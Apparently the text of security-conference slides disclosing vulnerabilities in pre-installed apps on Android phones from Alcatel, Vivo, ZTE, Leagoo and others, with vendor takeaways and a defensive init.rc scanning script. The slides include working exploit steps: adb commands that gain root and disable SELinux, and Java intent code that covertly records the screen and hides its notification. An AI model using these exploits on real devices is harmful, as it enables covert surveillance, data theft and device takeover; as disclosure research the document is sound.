– Alcatel A30, Asus Zenfone 3 Max, Leagoo P1, Nokia 6 TA-1025,
Asus ZenFone V Live & Sony Xperia L1
Malicious apps can open apps to obtain sensitive data and examine active
notifications
– Requires READ_EXTERNAL_STORAGE permission to access the
screenshot and EXPAND_STATUS_BAR to view current
notifications
Taking a screenshot is not transparent to the user
– A screen animation is displayed and a notification is created
– Cannot be disabled, as the functionality lies within system_server
– The attacking app can cause a system crash to remove the notification
– Can bypass the screen lock by using certain WindowManager.LayoutParams flags
31. Insecure Rich Communication Services (RCS) App
Source: https://www.t-mobile.com/devices/t-mobile-revvl-plus
Exported interfaces allow a zero-permission app to send arbitrary text messages, read and
modify text messages, and obtain the phone numbers of the user’s contacts
App has two different package names, where one is a
refactored version of the other
– com.rcs.gsma.na.sdk
– com.suntek.mway.rcs.app.service
Affects 3 T-Mobile devices: Coolpad Defiant,
T-Mobile Revvl Plus, and ZTE ZMAX Pro
App cannot be disabled
33. ZTE ZMAX Champ Vulnerabilities
Programmatic factory reset
– com.zte.zdm.sdm app writes --wipe_data to
/cache/recovery/command and boots into
recovery mode and wipes /data and /cache
Obtain logcat and modem logs
– Done in the same way described as previously for ZTE
“Brick” Device
– Device will boot into recovery mode, try to factory
reset, crash, and repeat and repeat some more
Source: https://www.zteusa.com/zmax-champ
35. Unlocked Alcatel A30 – Local root Privilege Escalation
Alcatel A30 was an Amazon Prime Exclusive device
– Had discounted price due to the inclusion of Amazon offers and ads
Certain read-only properties can be modified at runtime
allowing a socket that accepts and executes arbitrary
commands as the root user
– Can be performed via ADB or pre-installed platform apps that
execute as the system user
Source: https://www.amazon.com/gp/product/B01NC2RECJ
adb shell setprop ro.debuggable 1
adb shell setprop ro.secure 0
adb root
adb shell setenforce 0
adb shell
36. Unlocked Alcatel A30 – Socket that Executes Commands as root
Once the ro.debuggable property is set to 1,
then a world-writable socket named
factory_test gets created
– Receives and executes commands as root
The system user, including platform apps, can
change the ro.debuggable property so that
the factory_test socket gets created
MICKEY6US:/dev/socket # ls -al
total 0
drwxr-xr-x 7 root root 760 2017-05-10 17:58 .
drwxr-xr-x 15 root root 4220 2017-05-10 17:55 ..
srw-rw---- 1 system system 0 2017-05-10 17:58 adbd
srw-rw---- 1 root inet 0 1970-11-08 00:12 cnd
srw-rw---- 1 root mount 0 1970-11-08 00:12 cryptd
srw-rw---- 1 root inet 0 1970-11-08 00:12 dnsproxyd
srw-rw---- 1 root system 0 1970-11-08 00:12 dpmd
srw-rw---- 1 system inet 0 2017-05-10 17:55 dpmwrapper
srw-rw-rw- 1 root root 0 2017-05-10 17:58 factory_test
on property:ro.debuggable=1
start bt_wlan_daemon
service bt_wlan_daemon /system/bin/factory_test
user root
group root
oneshot
seclabel u:r:bt_wlan_daemon:s0
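The property trigger on this slide is the kind of thing worth scanning for across a firmware image rather than finding by hand. The script below is an added example, not code from the slides or from Alcatel's firmware: it reads init .rc text (taken from an unpacked image, or pulled from the device's root and /system/etc/init/ directories, which is an assumption about where to look) and lists every property trigger that starts a service running as root, using the init language's rule that a service with no user line runs as root. The rc text embedded in the script is constructed from the bt_wlan_daemon fragment shown on this slide plus a hypothetical logger service that should not be flagged.

```python
"""Added example: find init.rc property triggers that start root services."""

# Constructed sample: the slide's bt_wlan_daemon fragment plus a hypothetical
# non-root service so the filter has something to leave out.
SAMPLE_RC = """\
on property:ro.debuggable=1
    start bt_wlan_daemon

on property:sys.boot_completed=1
    start logger

service bt_wlan_daemon /system/bin/factory_test
    user root
    group root
    oneshot
    seclabel u:r:bt_wlan_daemon:s0

service logger /system/bin/logd
    user logd
    group logd
"""


def parse_rc(text):
    """Minimal parser for the line-oriented init language.

    Returns (triggers, services): trigger string -> services it starts,
    and service name -> {"path", "user"}. A service without a 'user' line
    runs as root, so that is the default recorded here.
    """
    triggers = {}
    services = {}
    section = None
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0] == "on":
            section, key = "on", " ".join(parts[1:])
            triggers.setdefault(key, [])
        elif parts[0] == "service" and len(parts) > 1:
            section, key = "service", parts[1]
            services[key] = {"path": parts[2] if len(parts) > 2 else None,
                             "user": "root"}
        elif section == "on" and parts[0] == "start" and len(parts) > 1:
            triggers[key].append(parts[1])
        elif section == "service" and parts[0] == "user" and len(parts) > 1:
            services[key]["user"] = parts[1]
    return triggers, services


def root_services_on_property(text, prop_prefix="property:"):
    """(trigger, service, binary) for every property trigger that starts a root service."""
    triggers, services = parse_rc(text)
    hits = []
    for trig, started in triggers.items():
        if not trig.startswith(prop_prefix):
            continue
        for name in started:
            svc = services.get(name)
            if svc is not None and svc["user"] == "root":
                hits.append((trig, name, svc["path"]))
    return hits


if __name__ == "__main__":
    for trig, name, path in root_services_on_property(SAMPLE_RC):
        print("%s -> %s (%s) as root" % (trig, name, path))
```

A hit is a lead, not a finding: the next questions are who can set that property on this build (a ro.* property should be write-once, which is exactly what the slide shows is not enforced here) and what the started binary listens on, which for factory_test was a world-writable socket.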
37. Takeaways - Towards More Secure Apps
Don’t export app components unnecessarily - enforce proper access control
Don’t assume apps without an accompanying Android Interface Definition
Language (AIDL) file cannot interact with a bound service…they can, by issuing raw Binder transactions
Filter commands when allowing command execution as system user
Make it easier to report vulnerabilities by having a common email address such
as security@<vendor>.com
Thanks for attending and read our full report for more details! (email at
oem@kryptowire.com)
38. Leagoo P1 & Leagoo Z5C (Unlocked)
Leagoo P1 - Android 7.0
– Take a screenshot and write to SD card
– Programmatic factory reset
– Local root privilege escalation via ADB
Leagoo Z5C - Android 6.0
– Send arbitrary text messages
• Modified com.android.messaging app
– Read the most recent text message from each
conversation
• Modified com.android.messaging app
– Programmatic factory reset
• Modified com.android.settings app
adb shell setprop ro.debuggable 1
adb shell setprop ro.secure 0
adb root
adb shell setenforce 0
adb shell
Source: https://www.amazon.co.uk/LEAGOO-Z5C-Android-smartphone-1-3GHz/dp/B06X3QLCGY
39. Exposing Capability to Set System Properties
App named com.qualcomm.qti.modemtestmode allows any app to set
certain properties as the com.android.phone user
– Presumably a development/debugging app that should not be included in production builds
<service android:exported="true" android:name=".MbnTestService"
android:process="com.android.phone"/>
Bound service that takes key/value pair for system properties
– android.os.SystemProperties.set(String, String)
Setting properties is constrained by SELinux rules
– Works for persist.* properties which survive reboots
40. Vivo V7 (Non-US Carriers) Vulnerabilities
Dumps logcat, Bluetooth, and kernel logs to external storage
– Leaves a notification while logging, but logging app cannot be disabled
Set properties as the com.android.phone user
– Can enable screen touch coordinates to be written to the logcat log
Record the screen for 60 minutes to attacking app’s directory
– A notification and icon appears but can be removed quickly
– Can initiate screen-recording while screen is off to remove
any disturbance on the screen
Source: https://www.vivo.com/my/products/v7
41. Vivo V7 (Non-US Carriers) Vulnerabilities
The 60 minute interval is set by the com.vivo.smartshot app
– Screen recording is performed by the /system/bin/smartshot binary
Intent i = new Intent();
i.setAction("vivo.action.ACTION_START_RECORD_SERVICE");
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
i.putExtra("vivo.flag.vedio_file_path", "/data/data/com.attacking.app/screen.mp4");
i.putExtra("show_top_stop_view", false);
startService(i);
try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}
i = new Intent();
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
stopService(i);
try {Thread.sleep(500);} catch (InterruptedException e) {e.printStackTrace();}
i = new Intent("vivo.acton.ACTION_CHANGE_TOP_STOP_VIEW");
i.setClassName("com.vivo.smartshot", "com.vivo.smartshot.ui.service.ScreenRecordService");
i.putExtra("show_top_stop_view", false);
startService(i);
Slide annotations on the code above:
– Starts recording
– Removes the notification
– Ensures at least one app component is running in the app, so it is less likely to get killed
– Requires changing permissions on the attacking app’s directory and file
42. Orbic Wonder (Unlocked) Vulnerabilities
Exposes sensitive functionality to any app on the device
– Wipe all user data (factory reset)
– Continuously monitor the logcat log to obtain
• GPS coordinates
• Email addresses
• Unique device identifiers
• Body of incoming/outgoing text messages
• Phone numbers for incoming/outgoing calls
and text messages
Vulnerabilities can be used to bypass two-factor
authentication and obtain password reset texts
Source: https://www.bestbuy.com/site/orbic-wonder-4g-lte-with-16gb-memory-cell-phone-unlocked-black/6070202.p?skuId=6070202